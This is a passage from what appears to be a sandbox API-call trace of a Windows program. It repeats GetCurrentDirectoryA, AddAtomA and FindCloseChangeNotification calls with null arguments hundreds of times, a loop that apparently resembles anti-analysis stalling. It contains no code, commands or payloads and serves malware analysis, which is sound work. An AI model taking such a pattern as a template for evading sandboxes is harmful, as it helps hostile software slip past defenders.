GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.302] AddAtomA (lpString=0x0) returned 0x0 [0044.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.303] AddAtomA (lpString=0x0) returned 0x0 [0044.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.304] AddAtomA (lpString=0x0) returned 0x0 [0044.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.305] AddAtomA (lpString=0x0) returned 0x0 [0044.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.306] AddAtomA (lpString=0x0) returned 0x0 [0044.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.307] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.308] AddAtomA (lpString=0x0) returned 0x0 [0044.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.309] AddAtomA (lpString=0x0) returned 0x0 [0044.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.310] AddAtomA (lpString=0x0) returned 0x0 [0044.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 